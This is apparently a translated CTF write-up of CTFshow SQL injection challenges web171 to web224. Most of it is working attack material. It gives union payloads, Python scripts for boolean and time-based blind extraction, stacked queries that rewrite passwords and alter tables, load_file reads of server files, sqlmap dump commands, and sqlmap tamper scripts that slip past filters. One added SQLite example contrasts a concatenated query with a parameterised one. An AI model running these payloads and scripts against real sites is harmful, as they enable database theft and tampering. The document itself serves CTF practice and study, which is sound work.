[Original] CTFshow: SQL Injection (171-253)

web171

-1' union select 1,database(),1%23

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'%23

Columns

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' %23

Dump the flag

-1' union select password,1,2 from ctfshow_user%23

One-shot kill

' or 1=1 union select 1,database(),1%23

By the way, I feel Y4tacker's write-up is not quite accurate here; if I have misunderstood, please leave a comment
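The union payload above, replayed against a query built by string concatenation and against the same query with a bound parameter. This is an added example, not code from the challenge or from the original post; the three-column schema, the sample rows, the query text and the use of SQLite (with `-- ` in place of MySQL's `#` comment) are assumptions.

```python
import sqlite3

FLAG = "flag{constructed-sample-value}"  # constructed sample, not a real flag


def make_db():
    """In-memory stand-in for the challenge table (schema is an assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table ctfshow_user (id integer, username text, password text)")
    db.executemany(
        "insert into ctfshow_user values (?, ?, ?)",
        [(1, "admin", "admin"), (2, "user1", "111"), (26, "flag", FLAG)],
    )
    return db


def lookup_concat(db, user_id):
    """Vulnerable form: the input becomes part of the SQL text."""
    sql = (
        "select id, username, password from ctfshow_user "
        "where username != 'flag' and id = '" + user_id + "' limit 1"
    )
    return db.execute(sql).fetchall()


def lookup_bound(db, user_id):
    """Hardened form: the input is bound as a value and never parsed as SQL."""
    sql = (
        "select id, username, password from ctfshow_user "
        "where username != 'flag' and id = ? limit 1"
    )
    return db.execute(sql, (user_id,)).fetchall()


# The page's final web171 payload, with the comment marker adapted to SQLite.
PAYLOAD = "-1' union select password,1,2 from ctfshow_user -- "

if __name__ == "__main__":
    db = make_db()
    # Concatenated query: the quote closes the literal, the UNION adds rows
    # that ignore the "username != 'flag'" condition, the comment drops "limit 1".
    print("concatenated:", lookup_concat(db, PAYLOAD))
    # Bound parameter: the whole payload is compared to id as one string.
    print("bound       :", lookup_bound(db, PAYLOAD))
    print("bound, id=1 :", lookup_bound(db, "1"))
```
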

web172

-1' union select 1,password from ctfshow_user2 where username='flag'%23

Method 2

It still works despite the restriction

-1' union select password,1 from ctfshow_user2 %23

Method 3 (Y4tacker)

-1' union select to_base64(username),hex(password) from ctfshow_user2 --+

web173

Bypass via encoding

-1' union select hex(password),1,2 from ctfshow_user3 %23

web174

Reportedly this one is blind injection

First, here is yq1ng's script

import requests
flag = ''
for i in range(1, 45):
    for j in r'0123456789abcdefghijklmnopqrstuvwxyz-{}':
        url = "http://a8e75e2a-2eb7-41a3-960a-025d28f8c09f.chall.ctf.show/api/v4.php?id="
        payload = '''1' and substr((select password from ctfshow_user4 where username="flag"),%d,1)="%c"--+'''% (i,j)
        r = requests.get(url + payload)
        #print(url+payload)
        #print(r.text)
        if 'admin' in r.text:
            flag += j
            print(flag)
            break

I'll write my own later

Huh, I can't work it out

web175

Time-based blind injection

import requests
import time
url = "http://934fe7e1-b84c-4223-81ed-9268aa9dc3c1.chall.ctf.show/api/v5.php?id=1'"
name = ''
for number1 in range(1,50):
    for number2 in range(45,126):
        payload = "and if(substr((select password from ctfshow_user5 where username='flag'),%d,1) = '%c',sleep(1),0) --+" % (number1,chr(number2))
        current1_time = time.time()
        response = requests.get(url + payload)
        current2_time = time.time()
        current = current2_time - current1_time
        if current >= 1:
            name = name + chr(number2)
            print(str.lower(name))
            break

web176

' or 1=1%23

The universal password

web177

1'/**/or/**/1=1%23

web178

1'%09union%09select%091,2,password%09from%09ctfshow_user%23

web179

1'%0cor%0c1=1%23

web180-182

'or(mid(username,1,1)='f')and'1'='1

If you ask, the answer is: I don't know

web183

# @Author:Y4tacker
import requests
url = 'http://e4349ccf-974a-4b59-b340-cc4d9507d117.chall.ctf.show/select-waf.php'
flagstr = r"{flqazwsxedcrvtgbyhnujmikolp-0123456789}"
res = ""
for i in range(1,46):
    for j in flagstr:
        data = {
            'tableName': f"(ctfshow_user)where(substr(pass,{i},1))regexp('{j}')"
        }
        r = requests.post(url, data=data)
        if '$user_count = 1;' in r.text:
            print(data)
            res += j
            print(res)
            break

Equivalent to

yq1ng

# encoding: utf-8
import requests
url = '''http://898034b5-dc30-4856-9230-a65688cba1ac.chall.ctf.show/select-waf.php'''
data = {"tableName":""}
flag = '}'
s = requests.session()
for x in range(2,50):
    for y in r'abcdefghijklmnopqrstuvwxyz{-}0123456789':
        data["tableName"]="(ctfshow_user)where(right(pass,%d))like'%s'"%(x,y+flag)
        #print(data)
        s = requests.post(url,data = data)
        #print(s.text)
        if '$user_count = 1;' in s.text:
            flag = y + flag
            print(flag)
            break

web184

# @Author:Y4tacker
import requests
url = "http://f15ac2ca-94b7-4257-a52a-00e52ecee805.chall.ctf.show/select-waf.php"
flag = 'flag{'
for i in range(45):
    if i <= 5:
        continue
    for  j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{i},1)regexp(char({j})))"
        }
        r = requests.post(url,data=data)
        if r.text.find("$user_count = 43;")>0:
            if chr(j) != ".":
                flag += chr(j)
                print(flag.lower())  # convert to lowercase
                if chr(j) == "}":
                    exit(0)
                break

Why is the check done this way?

web185-web186

Digits are filtered

You can build any number you need out of true

Sooo impressive

So this trick exists too

# @Author:Y4tacker
import requests
url = "http://5e4fd189-577b-46ca-8c62-36c587b88a3f.chall.ctf.show/select-waf.php"
flag = 'flag{'
def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
    return num
for i in range(45):
    if i <= 5:
        continue
    for j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{createNum(i)},{createNum(1)})regexp(char({createNum(j)})))"
        }
        r = requests.post(url, data=data)
        if r.text.find("$user_count = 43;") > 0:
            if chr(j) != ".":
                flag += chr(j)
                print(flag.lower())
                if chr(j) == "}":
                    exit(0)
                break

The rest of the approach is the same as the previous challenge

web187

If you ask: just look at the masters' techniques

https://yq1ng.github.io/z_post/BJDCTF2020%E5%85%A8%E5%AE%B6%E6%A1%B6/#bjdctf2020easy-md5

https://y4tacker.blog.csdn.net/article/details/107813286

Note: what follows is essentially reposted; I will add my own material when I review it later. I'm both unskilled and lazy

web188

web189

# Author:Y4tacker
import requests
url = "http://d76c7201-f04e-4872-a71e-ac5f375d77e4.chall.ctf.show/api/"
def getFlagIndex():
    head = 1
    tail = 300
    while head < tail:
        mid = (head + tail) >> 1
        data = {
            'username': "if(locate('flag{'," + "load_file('/var/www/html/api/index.php'))>{0},0,1)".format(str(mid)),
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            head = mid + 1
        else:
            tail = mid
    return mid
def getFlag(num):
    i = int(num)
    result = ""
    while 1:
        head = 32
        tail = 127
        i = i + 1
        while head < tail:
            mid = (head + tail) >> 1
            data = {
                'username': "if(ascii(substr(load_file('/var/www/html/api/index.php'),{0},1))>{1},0,1)".format(str(i), str(mid)),
                'password': '1'
            }
            r = requests.post(url, data=data)
            if "密码错误" == r.json()['msg']:
                head = mid + 1
            else:
                tail = mid
            mid += 1
        if head != 32:
            result += chr(head)
            print(result)
        else:
            break
if __name__ == '__main__':
    index = getFlagIndex()
    getFlag(index)

I'll explain this in detail when I review it later

web190

# @Author:Y4tacker
import requests
url = "http://02e6409f-d1ac-41e0-8355-c7e0cb8ca1d8.chall.ctf.show/api/"
result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Enumerate tables
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # Enumerate columns
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # Read the flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(ascii(substr(({payload}),{i},1))>{mid},1,2)='1",
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误"  == r.json()['msg']:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web191

# @Author:Y4tacker
import requests
url = "http://6b45cf63-6376-4aa1-a618-68a6dcf5fbdb.chall.ctf.show/api/"
result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Enumerate tables
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # Enumerate columns
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # Read the flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(ord(substr(({payload}),{i},1))>{mid},1,2)='1",
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误"  == r.json()['msg']:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid
    last = result
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web192

# @Author:Y4tacker
import requests
import string
url = "http://62f3122b-55d1-4f92-b6bb-61aee97320e2.chall.ctf.show/api/"
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
for i in range(1,45):
    for j in flagstr:
        payload = f"admin' and if(substr((select group_concat(f1ag) from ctfshow_fl0g),{i},1)regexp('{j}'),1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            flag += j
            print(flag)
            if "}" == j:
                exit(0)
            break

web193-194

193

194

Script

# @Author:Y4tacker
import requests
# instr and similar functions should also work: LOCATE, POSITION, INSTR, FIND_IN_SET, IN, LIKE
url = "http://6272c73f-a029-482e-b9d4-7ea07985da1c.chall.ctf.show/api/"
final = ""
stttr = "flag{}-_1234567890qwertyuiopsdhjkzxcvbnm"
for i in range(1,45):
    for j in stttr:
        final += j
        # Table name: ctfshow_flxg
        # payload = f"admin' and if(locate('{final}',(select table_name from information_schema.tables where table_schema=database() limit 0,1))=1,1,2)='1"
        # Column name: f1ag
        # payload = f"admin' and if(locate('{final}',(select column_name from information_schema.columns where table_name='ctfshow_flxg' limit 1,1))=1,1,2)='1"
        payload = f"admin' and if(locate('{final}',(select f1ag from ctfshow_flxg limit 0,1))=1,1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误" == r.json()['msg']:
            print(final)
        else:
            final = final[:-1]

import requests
import string
url = "http://2c0073f7-8662-4a12-a742-f17e1818ed0a.chall.ctf.show/api/"
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
z = 'flag'
for i in range(1,45):
    for j in flagstr:
        payload = f"admin' and if((select group_concat(f1ag) from ctfshow_fl0g)regexp('{j}'),1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            flag += j
            print(flag)
            if "}" == j:
                exit(0)
            break

web195

username=1;update`ctfshow_user`set`pass`=1;
password=1

web196

username=1;select(1)
password=1

web197-198

username=1;show+tables;
password=ctfshow_user

Or

# @Author:Y4tacker
import requests
url = "http://b0e2784c-4c27-4c2a-8b05-6bcb7492265e.chall.ctf.show/api/"
for i in range(100):
    if i == 0:
        data = {
            'username': '0;alter table ctfshow_user change column `pass` `ppp` varchar(255);alter table ctfshow_user '
                        'change column `id` `pass` varchar(255);alter table ctfshow_user change column `ppp` `id` '
                        'varchar(255);',
            'password': f'{i}'
        }
        r = requests.post(url, data=data)
    data = {
        'username': '0x61646d696e',
        'password': f'{i}'
    }
    r = requests.post(url, data=data)
    if "登陆成功" in r.json()['msg']:
        print(r.json()['msg'])
        break

I can't do these; it's all other people's answers, argh

web199-200

username=0;show+tables;
password=ctfshow_user

Finally a few I can do myself

web201

No need to spoof the User-Agent for this one

py sqlmap.py -u http://73d92ba3-e4fe-49c1-b5cb-cefb8f75d44d.chall.ctf.show/api/?id=1 --referer=ctf.show --dbs
py sqlmap.py -u http://73d92ba3-e4fe-49c1-b5cb-cefb8f75d44d.chall.ctf.show/api/?id=1 --referer=ctf.show -D ctfshow_web --tables
py sqlmap.py -u http://a517c28e-e14d-48dd-94cb-69e854c5214b.chall.ctf.show/api/?id=1 --referer=ctf.show -D ctfshow_web -T ctfshow_user --columns
py sqlmap.py -u http://a517c28e-e14d-48dd-94cb-69e854c5214b.chall.ctf.show/api/?id=1 --referer=ctf.show -D ctfshow_web -T ctfshow_user -C pass --dump

web202

py sqlmap.py -u http://c9221043-61cc-430e-a7ec-4698e3f372b4.chall.ctf.show/api/ --referer=ctf.show --data=id=1 --dbs
py sqlmap.py -u http://c9221043-61cc-430e-a7ec-4698e3f372b4.chall.ctf.show/api/ --referer=ctf.show --data=id=1 -D ctfshow_web --tables
py sqlmap.py -u http://c9221043-61cc-430e-a7ec-4698e3f372b4.chall.ctf.show/api/ --referer=ctf.show --data=id=1 -D ctfshow_web -T ctfshow_user --columns
py sqlmap.py -u http://c9221043-61cc-430e-a7ec-4698e3f372b4.chall.ctf.show/api/ --referer=ctf.show --data=id=1 -D ctfshow_web -T ctfshow_user -C pass --dump

web203

py sqlmap.py -u "http://6bb1995d-1789-43d6-b56f-7b1239fddb8b.chall.ctf.show//api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain"  -D ctfshow_web -T ctfshow_user -C pass --dump

web204

py sqlmap.py -u http://9b1979c0-0fdd-4157-b718-57f76513a534.chall.ctf.show/api/index.php --cookie=*** --method=PUT --data=id=1 --referer=ctf.show --headers="Content-Type: text/plain"  --dbms=mysql -D ctfshow_web -T ctfshow_user -C pass --dump

Remember to include the cookie value

web205

There is an interesting point here, so I'll go into detail

First, capture the traffic

The first request

The second

If we send the second request on its own, we get a prompt

This shows that before each request to URL/api/index.php, a request to URL/api/getToken.php must be made first

--safe-url   the safe URL to visit before testing the target address
--safe-freq  how often the safe URL is visited between injection tests

The master says to take it one step at a time

py sqlmap.py -u http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/index.php --method=PUT --data=id=1 --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/getToken.php --safe-freq=1 --dbs

py sqlmap.py -u http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/index.php --method=PUT --data=id=1 --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/getToken.php --safe-freq=1 -D ctfshow_web --tables

Columns

py sqlmap.py -u http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/index.php --method=PUT --data=id=1 --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/getToken.php --safe-freq=1 -D ctfshow_web -T ctfshow_flax --columns

flag

py sqlmap.py -u http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/index.php --method=PUT --data=id=1 --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://992bdc76-011a-4f78-a34d-5a0ae557a1ee.chall.ctf.show/api/getToken.php --safe-freq=1 -D ctfshow_web -T ctfshow_flax -C flagx --dump

web206

y4tacker is so cute, hehe

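It doesn't matter much here, so I won't go into it
In short, the SQL needs to be closed properly
--prefix=PREFIX     Injection payload prefix string
--suffix=SUFFIX     Injection payload suffix string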
py sqlmap.py -u http://5e6ed067-d2d1-4554-b13e-575da60d6dbd.chall.ctf.show/api/index.php --method=PUT --data=id=1 --referer=ctf.show --dbms=mysql  --headers="Content-Type: text/plain" --safe-url=http://5e6ed067-d2d1-4554-b13e-575da60d6dbd.chall.ctf.show/api/getToken.php --safe-freq=1 -D ctfshow_web -T ctfshow_flaxc -C flagv --dump

web207-208

#!/usr/bin/env python
"""
name: huayang
"""
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web入门—SQL注入web207-8 tamper<<<\n")
def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x09)
                    continue
            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x09)
                continue
            retVal += payload[i]
    return retVal
py sqlmap.py -u "http://ee4ef35c-aa6e-4134-92fb-16c23f2e0dd2.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://ee4ef35c-aa6e-4134-92fb-16c23f2e0dd2.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --batch --tamper=ctfshow.py -D ctfshow_web -T ctfshow_flaxca -C flagvc --dump

y4tacker's method

py sqlmap.py -u "http://10833ca0-1149-48e4-b256-55f28c60a8c3.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://10833ca0-1149-48e4-b256-55f28c60a8c3.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --current-db --dump --batch --prefix="')" --tamper=space2comment

This dumps databases, tables, columns, everything

It has to be stopped manually

Let's go one step at a time

py sqlmap.py -u "http://e28f9875-080f-42c1-874f-49cc5d3391e0.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://e28f9875-080f-42c1-874f-49cc5d3391e0.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --batch --prefix="')" --tamper=space2comment --dbs
py sqlmap.py -u "http://e28f9875-080f-42c1-874f-49cc5d3391e0.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://e28f9875-080f-42c1-874f-49cc5d3391e0.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --batch --prefix="')" --tamper=space2comment -D ctfshow_web --tables
py sqlmap.py -u "http://eee0ac2f-7143-432f-9af1-254a84e00526.chall.ctf.show//api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://eee0ac2f-7143-432f-9af1-254a84e00526.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --batch --prefix="')" --tamper=space2comment -D ctfshow_web -T ctfshow_flaxca --columns
py sqlmap.py -u "http://eee0ac2f-7143-432f-9af1-254a84e00526.chall.ctf.show//api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://eee0ac2f-7143-432f-9af1-254a84e00526.chall.ctf.show/api/getToken.php" --safe-freq=1 --dbms=mysql --batch --prefix="')" --tamper=space2comment -D ctfshow_web -T ctfshow_flaxca -C flagvc --dump

Tired

web209

#!/usr/bin/env python
"""
Author: huayang
"""
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web入门—SQL注入web209 tamper<<<\n")
def tamper(payload, **kwargs):
    retVal = payload
    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False
        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x09)
                    continue
            elif payload[i] == "*":
                retVal += chr(0x31)
                continue
            elif payload[i] == "=":
                retVal += chr(0x09) + 'LIKE' + chr(0x09)
                continue
            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x09)
                continue
            retVal += payload[i]
    return retVal
py sqlmap.py -u "http://b2907f66-9ee5-4dfa-ae0e-679265c4574c.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url=http://b2907f66-9ee5-4dfa-ae0e-679265c4574c.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper="ctfshow" --prefix="'" --dbms=mysql -D ctfshow_web -T ctfshow_flav -C ctfshow_flagx --dump --batch

web210

#!/usr/bin/env python
"""
Author: huayang
"""
import base64
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web入门—SQL注入web210 tamper<<<\n")
def tamper(payload, **kwargs):
    retVal = ""
    if payload:
        retVal = base64.b64encode(payload[::-1].encode('utf-8'))
        retVal = base64.b64encode(retVal[::-1]).decode('utf-8')
    return retVal
py sqlmap.py -u "http://dc8c7ec6-bff7-4863-a9ed-fdb374ab6b63.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url=http://dc8c7ec6-bff7-4863-a9ed-fdb374ab6b63.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper="ctfshow" --dbms=mysql -D ctfshow_web -T ctfshow_flavi -C ctfshow_flagxx --dump --batch

web211

#!/usr/bin/env python
"""
Author: huayang
"""
import base64
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web入门—SQL注入web211 tamper<<<\n")
def tamper(payload, **kwargs):
    retVal = ""
    if payload:
        payload = payload.replace(" ", "/**/")
        retVal = base64.b64encode(payload[::-1].encode('utf-8'))
        retVal = base64.b64encode(retVal[::-1]).decode('utf-8')
    return retVal
py sqlmap.py -u "http://3b44b265-781f-45fa-8c85-b0830f16c7b1.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url=http://3b44b265-781f-45fa-8c85-b0830f16c7b1.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper="ctfshow" --dbms=mysql -D ctfshow_web -T ctfshow_flavia -C ctfshow_flagxxa --dump --batch

web212

#!/usr/bin/env python
"""
Author: huayang
"""
import base64
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
    singleTimeWarnMessage("\n\n\t>>>web入门—SQL注入web212 tamper<<<\n")
def tamper(payload, **kwargs):
    retVal = ""
    if payload:
        payload = payload.replace(" ", chr(0x09))
        retVal = base64.b64encode(payload[::-1].encode('utf-8'))
        retVal = base64.b64encode(retVal[::-1]).decode('utf-8')
    return retVal
py sqlmap.py -u "http://2944196a-5ac2-42d0-8de4-05cb2c90edad.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url=http://2944196a-5ac2-42d0-8de4-05cb2c90edad.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper="ctfshow" --dbms=mysql -D ctfshow_web -T ctfshow_flavis -C ctfshow_flagxsa --dump --batch

What about another way?

py sqlmap.py -u "http://2944196a-5ac2-42d0-8de4-05cb2c90edad.chall.ctf.show/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url=http://2944196a-5ac2-42d0-8de4-05cb2c90edad.chall.ctf.show/api/getToken.php --safe-freq=1 --tamper="ctfshow" --dbms=mysql --current-db --dump --batch

web213

web214

import requests
import time
url = "http://01dcd092-b929-4a5c-be0b-1ad5bffe1292.chall.ctf.show/api/"
name = ''
for number1 in range(1,50):
    for number2 in range(45,126):
        #payload = f'if(substr(database(),{number1},1) = "{chr(number2)}",sleep(1),1)'  # this step can be skipped; substituting the database name found here for database() and table_schema below may be more accurate
        #payload = f'if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = "{chr(number2)}",sleep(2),1)'
        #payload = f'if(substr((select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx" and table_schema="ctfshow_web"),{number1},1) = "{chr(number2)}",sleep(2),1)'
        payload = f"if(substr((select flaga from ctfshow_flagx),{number1},1) = '{chr(number2)}',sleep(1),1)"
        data = {
            'ip':payload,
            'debug':'0'
        }
        # current1_time = time.time()
        response = requests.post(url,data=data)
        # new trick
        elapsed = response.elapsed.total_seconds()  # response time in seconds
        # current2_time = time.time()
        # current = current2_time - current1_time
        if elapsed >= 1:
            name = name + chr(number2)
            print(str.lower(name))
            break

The consequence of concatenating with group_concat

It's a matter of opinion

web215

This is simply string-type injection

#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
url = "http://c6778fe7-8d66-4e93-a617-efcdb0c32c18.chall.ctf.show/api/"
name = ''
for number1 in range(1,50):
    for number2 in range(45,126):
        #payload = f"1' or if(substr(database(),{number1},1) = '{chr(number2)}',sleep(1),1) and '1'='1"  # this step can be skipped; substituting the database name found here for database() and table_schema below may be more accurate
        #payload = f"1' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = '{chr(number2)}',sleep(2),1) and '1'='1"
        #payload = f"1' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc' and table_schema='ctfshow_web'),{number1},1) = '{chr(number2)}',sleep(2),1) and '1'='1"
        payload = f"1' or if(substr((select flagaa from ctfshow_flagxc),{number1},1) = '{chr(number2)}',sleep(1),1) and '1'='1"
        data = {
            'ip':payload,
            'debug':'0'
        }
        # current1_time = time.time()
        response = requests.post(url,data=data)
        # new trick
        elapsed = response.elapsed.total_seconds()  # response time in seconds
        # current2_time = time.time()
        # current = current2_time - current1_time
        if elapsed >= 1:
            name = name + chr(number2)
            print(str.lower(name))
            break
# 1' or if(substr(database(),1,1) = "c",sleep(1),1) and '1'='1

web216

#!/usr/bin/env python
"""
Author: huayang
"""
import requests
import time
url = "http://2054d86a-48f1-4cb2-aaf2-57b193eb3c81.chall.ctf.show/api/"
name = ''
for number1 in range(1,50):
    for number2 in range(45,126):
        #payload = f"'MQ==' or if(substr(database(),{number1},1) = '{chr(number2)}',sleep(1),1)"  # this step can be skipped; substituting the database name found here for database() and table_schema below may be more accurate
        #payload = f"'MQ==' or if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{number1},1) = '{chr(number2)}',sleep(2),1)"
        #payload = f"'MQ==' or if(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc' and table_schema='ctfshow_web'),{number1},1) = '{chr(number2)}',sleep(2),1)"
        payload = f"'MQ==' or if(substr((select flagaac from ctfshow_flagxcc),{number1},1) = '{chr(number2)}',sleep(1),1)"
        data = {
            'ip':payload,
            'debug':'0'
        }
        # current1_time = time.time()
        response = requests.post(url,data=data)
        # new trick
        elapsed = response.elapsed.total_seconds()  # response time in seconds
        # current2_time = time.time()
        # current = current2_time - current1_time
        if elapsed >= 1:
            name = name + chr(number2)
            print(str.lower(name))
            break

web217

Here is the master's script

"""
Author:Y4tacker
"""
import requests
import time
url = "http://47203814-6435-4a5d-9652-7eab0c963c66.chall.ctf.show/api/"
result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Enumerate tables
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # Enumerate column names
        # payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxccb' limit 1,1"
        # Read the data --- it cannot all be read in one pass; it gets less accurate further along
        payload = "select flagaabc from ctfshow_flagxccb"
        #flag{7e7c6a3e-a0f8-41cd-b197-1cd-b197-b50f9b3012ab}
        #flag{97ff8fcd-392f-P41h-7290-gP2-167h-D23ggg5
        data = {
            'ip': f"1) or if(ascii(substr(({payload}),{i},1))>{mid},benchmark(3480500,sha(1)),1",
            'debug':'0'
        }
        try:
            r = requests.post(url, data=data, timeout=1)
            # time.sleep(0.3)
            tail = mid
        except Exception as e:
            head = mid + 1
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web218-221

web222

I'll use the master's script again; too hard

"""
Author:Y4tacker
"""
import requests
url = "http://a38a5e3f-ff47-4a57-af13-13f92c085734.chall.ctf.show/api/"
result = ""
i = 0
while True:
    i = i + 1
    head = 32
    tail = 127
    while head < tail:
        mid = (head + tail) >> 1
        # Enumerate tables
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # Enumerate column names
        # payload = "select column_name from information_schema.columns where table_name='ctfshow_flaga' limit 1,1"
        # Read the data --- it cannot all be read in one pass; it gets less accurate further along
        payload = "select flagaabc from ctfshow_flaga"
        # flag{b747hfb7-P8e8-
        params = {
            'u': f"concat((if (ascii(substr(({payload}),{i},1))>{mid}, sleep(0.05), 2)), 1);"
        }
        try:
            r = requests.get(url, params=params, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web223

No idea, no idea

"""
Author:Y4tacker
"""
import requests
def generateNum(num):
    res = 'true'
    if num == 1:
        return res
    else:
        for i in range(num - 1):
            res += "+true"
        return res
url = "http://1a3bb281-c99f-4e72-a1b9-0e41c002ed68.chall.ctf.show/api/"
i = 0
res = ""
while 1:
    head = 32
    tail = 127
    i = i + 1
    while head < tail:
        mid = (head + tail) >> 1
        # Enumerate tables: ctfshow_flagas
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # Enumerate columns: flagasabc
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'"
        # Read the flag
        payload = "select flagasabc from ctfshow_flagas"
        params = {
            "u": f"if(ascii(substr(({payload}),{generateNum(i)},{generateNum(1)}))>{generateNum(mid)},username,'a')"
        }
        r = requests.get(url, params=params)
        # print(r.json()['data'])
        if "userAUTO" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        res += chr(head)
    else:
        break
    print(res)

web224

Blind guess: there is a robots.txt

After logging in, there is a file upload

According to the masters' write-ups, this is not an image-webshell upload

